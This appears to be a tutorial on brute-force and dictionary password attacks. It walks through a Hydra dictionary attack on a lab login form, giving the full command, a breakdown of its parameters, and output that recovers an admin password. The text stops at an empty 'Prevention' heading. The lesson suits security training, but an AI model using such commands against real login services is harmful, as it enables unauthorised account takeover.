Brute force attacks work by calculating every possible combination that could make up a password and testing it to see if it is the correct password. As the password’s length increases, the amount of time, on average, to find the correct password increases exponentially. This means short passwords can usually be discovered quite quickly, but longer passwords may take decades [Source : Wiki]
It may be feasible in some situations as computer hardwares are getting faster and faster. A simple brute-force attack would start with one-digit passwords, then two-digit passwords and so on, trying all possible combinations until one works.
A better idea is “dictionary attack” that tries words in a dictionary — or a list of common passwords — instead of all possible passwords. This can be very effective, as many people use such weak and common passwords.
We can use automated tool for Brute forcing web-based login form
Using Hydra to dictionary-attack web-based login forms
Hydra is an online password cracking for dictionary-attacks. It tries lists of user-names and passwords until a successful login is found. It is multi-threaded and can try username/password combinations at a rate of thousands per minute [Source
Hydra can be used to attack many different services including IMAP, SMB, HTTP, VNC, MS-SQL MySQL, SMTP, SSH, and many more
This tool should not be used to attack websites or services where you do not have permission to do so. Use this for legitimate testing purposes only.
An example attack
The Web Security Dojo has various vulnerable applications that you can use to test these techniques. So looking at an example the w3af testing framework has a test login at the following location
http://192.168.1.69/w3af/bruteforce/form_login/
The important parts of the HTML form are:
<form name="input" action="dataReceptor.php" method="post"> Username: <input type="text" name="user">
Password: <input type="password" name="pass"> |
If we put in one wrong username and password combination we get:
Bad login, stop bruteforcing me!Bad u/p combination for user: a
So, now we have the information we need to attack this login form, we can use this info to construct a Hydra brute-force attack as follows:
hydra 192.168.1.69 http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
If we break this up
Host = 192.168.1.69
Method = http-form-post
URL = /w3af/bruteforce/form_login/dataReceptor.php
Form parameters = user=^USER^&pass=^PASS^
Failure response = Bad login
Users file = users.txt
Password file = pass.txt
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt
Hydra basically iterates through all the username/password combinations, until it gets a response that does not contain the text “Bad login”. When we run this attack we get:
Hydra basically iterates through all the username/password combinations, until it gets a response that does not contain the text "Bad login". When we run this attack we get:
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.Hydra (http://www.thc.org/thc-hydra) starting at 2011-08-22 13:11:03
[DATA] 5 tasks, 1 servers, 5 login tries (l:5/p:1), ~1 tries per task
[DATA] attacking service http-post-form on port 80
[STATUS] attack finished for 192.168.1.69 (waiting for children to finish)
[80][www-form] host: 192.168.1.69 login: admin password: 1234
Hydra (http://www.thc.org/thc-hydra) finished at 2011-08-22 13:11:07
As you can see, this was successful and found the user "admin" with password "1234".
Prevention